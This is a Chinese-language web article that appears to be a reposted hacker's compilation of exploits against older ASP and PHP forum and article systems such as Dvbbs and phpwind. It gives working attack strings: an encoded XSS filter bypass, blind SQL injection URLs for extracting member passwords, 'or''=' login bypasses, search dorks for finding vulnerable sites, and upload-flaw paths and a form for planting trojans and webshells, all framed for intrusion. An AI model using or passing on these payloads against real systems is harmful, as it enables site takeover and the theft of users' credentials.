老兵新传-各种漏洞的利用和一些搜索参数

 更新时间:2007年01月16日 00:00:00   投稿:mdxy-dxy  
这篇文章主要介绍了老兵新传-各种漏洞的利用和一些搜索参数

各种漏洞的利用和一些搜索参数  
说到漏洞,首先应该提到的就是动网的上传漏洞了。  

"洞网"漏洞拉开了上传漏洞文件的序幕,其他系统的上  
传漏洞接踵而来!  

asp动网论坛漏洞分析  

1、这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的。例子说明一下,在发帖时写入[img]javas&#x63ript:window.open(‘htt&#x70://www.fwcn.com’,’’)[/img] 很清楚地看到,#x63解码的字母是"c",#x70解码的字母是"p",&起到连接作用,最后加上[img],使JS被触发,如果论坛支持flash插入,用[swf]也可。利用这个漏洞可以搞些恶作剧,写上诱人的主题,点进去结果是他的主页(骗点击率,作广告),甚至更绝,连到一个有病毒、木马的网页上,让你直想骂娘。这个漏洞存在于动网的各个版本,包括较新的0519版,覆盖面积之广让人瞠目,各人认为应该对某些非法字符进行检测剔除,而非简简单单地拆分了事,真希望动网开发者能尽早补上这漏洞。  

2、比起前者,第二个漏洞问题就大啦,利用该漏洞可以破解掉论坛上所有注册会员的密码(恐怖~~~),由于论坛管理员通常直接把论坛程序载下来梢加以美工就拿来使用了,图方便直接导致了漏洞的出现,我们也载一个回来,只要看一下动网的数据库,就知道了密码的字段为userpassword,接着例如要破一个名叫abc的用户密码,首先察看abc的用户资料,给出的连接是http://xxxxx/dispuser.asp?name=abc ,在dispuser.asp中,读取参数的语句是:username=trim(request("name")),数据库的查询的语句是: sql="select * from [user] where username=’"&username&"’",看得出来, abc就是直接被作为了dispuer的一个参数username,另外,如果该用户不存在,程序就会给出提示,既然如此,我们就再写入个查询密码的条件,在where username=abc后面加上and userpassword="******",理论上这样就可以实现对密码的破解了,但这么破要破到何年何月,现在就要轮到VBS函数大显身手了,可以先用len函数试出用户的密码位数,地址就这么写http://xxxxx/dispuser.asp?name=abc’%20and%20len(userpassword)=5%20and%20’1’=’1,这么看可能不好理解,放到sql语句里其实就是这副样子:sql="select * from [User] where username=’abc’ and len(UserPassword)=5 and ’1’=’1’",现在明白点了吧,%20是空格,abc后面的单引号和’1’=’1里的单引号都是为了和sql语句相匹配。奇怪,该用户不存在,喔?那就说明符合这个条件的用户没有,继续,把5换成6,7,8,依此类推,只要能显示出用户资料了,就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了,继续要用到VBS,可以用left或right或mid函数,http://xxxxx/dispuser.asp?name=abc’%20and%20left(userpassword,1)=’a,如果猜对了就给出用户资料,猜对了就给出该用户不存在的提示,这样子还是嫌太慢,那就在外面再套个asc函数,http://xxxxx/dispuser.asp?name=abc’%20and%20asc(mid(userpassword,1,1))>’50 试出用户密码的ASCII码是否大于50,不断地缩小范围,相信很快就能将范围缩小至个位数,看到这里你是否惊出了一身冷汗,起码我是如此,靠几个函数的灵活运用,保守地说,不出半小时就能破解出密码。真是不幸中的大幸,动网开发者在后来的05**版后使用了MD5的加密,这下子总算放心了,但介于国内还有许多地方在使用老版本的动网论坛  

3 、动网SQL语句漏洞  
此漏洞针对动网SQL版本。  
测试方法:在http://ip/bbs/admin_index.asp 输入用户名是’or’’=’ 密码也是这个  
这样可以跳过认证  
原理:利用SQL语法。输入的密码和ID就成为一个合法的SQL语句,直接跳过认证。  
此漏洞并不针对动网。很多SQL的ASP都会有这个漏洞  

4、动网论坛sp2漏洞 (此漏洞影响范围甚大,动网官方站、黑客防线、安全基地都曾因此被黑过,具体资料大家可以在百度搜一下)  
上传漏洞路径:reg_upload.asp及upfile.asp  

  

青创文章系统  

打开google 输入.tw qcdn (或者是去百度搜索 Powered by:QCDN_NEWS 但大多数是中国的)  
青创文章系统  
上传漏洞。在网址后加/admin_upfile.asp 如果出现。  
Microsoft VBScript 磅︽顶琿岿粇 岿粇 ’800a01b6’  
ンぃや穿妮┦┪よ猭: ’form’  
/article/admin_upfile.asp, 21  
就代表已经有90%以上的希望了  
桂林老兵的上传工具上传木马  
入侵的時候發現admin_upfile.asp改了。你也可以改成user_upfile.asp也上傳傳馬馬。還有一個方法就是把admin_upfile.asp user_upfile.asp加到注入工裏邊  

青创文章管理系统注入功击  
关键字"list.asp?unid="  
工具:  
  1、NBSI好像大部分黑客站点都有得下。  
  2、MD5Crack2,破解MD5加密的软件(磊子推荐:dos下DV.exe比较好用)  
第一次检测的时候,会报告"暂未检测到注入漏洞";然后在"特征字符"输入"Unid"  
(提示:"Unid"中的" U "一定要是大写的  

  


"飞龙文章管理系统" 漏洞  

飞龙文章管理系统 Ver 2.0 Build 20040620 正式版漏洞利用  
搜索"Article.asp?ArtID="关键字  
漏洞文件在  
admin_upfile.asp  
user_upfile.asp  
这两个文件"upfile.asp"  
动网漏洞的再现  
上传时cookie中加"ArtID=1111;"  

  

phpwind 1.3.6 的论坛漏洞的利用  
搜索关键字"POWER BY PHPWIND v1.3.6"  

phpwind1.3.6论坛利用程序 "群共享"中有上传  


保存后,木马地址为当前目录下的faq.php  

在本机用如下表单进行提交:  
<form ENCTYPE="multipart/form-data" ACTION="http://1717t.78cm.com/faq.php"  
METHOD="POST">  
<input NAME="MyFile" TYPE="file">  
<input VALUE=" 提交 " TYPE="submit">  
</form>  
上传成功后的木马存在论坛目录下  
直接访问就行!  

  

漏洞集合  

1)Co Net MiB Ver1.0~4.0 用’or’=’or’登陆管理员(一个比较经典的漏洞)  

2)ASP Calendar漏洞 请在google搜索Maintained with the Ocean12 ASP Calendar Manager v1.01这个信息,程序的默认数据库为o12cal.mdb(非MD5加密,明文保存)  

http://www.3589.com/tian/4login.asp把4login.asp改成conn.inc  

<%DBPath=Server.MapPath("wz520#.mdb")  
Set conn=Server.CreateObject("ADODB.Connection")  
conn.Open "Driver={Microsoft Access Driver (*.mdb)};DBQ="&DBPath%>  

wz520#.mdb,他就是数据库了。#改成%23就可以下载数据库了  


4)青创文章系统出现严重漏洞 在网址后加/admin_upfile.asp上传WEBSHELL  

还可以用%5c暴库,通杀  

"list.asp?unid=" " .tw/list.asp?unid= " 存在注入 在"特征字符"输入"Unid"  
("Unid"中的" U "一定要是大写的)  

5)自由动力3.6的软件上传过滤不严 用WinHex.exe和WSockExpert.exe修改上传木马  

E时代驿站漏洞  
百度搜索"E时代驿站"  
漏洞利用页面 /upload.asp 用老兵直接上传  

沸腾新闻系统上传漏洞  
搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用  
漏洞:没有对空格进行严格的限制。  
所以,我们直接选定要上传的asp木马,然后在后面加上空格  
它的上传文件是UploadFaceOK.asp  

相关文章

最新评论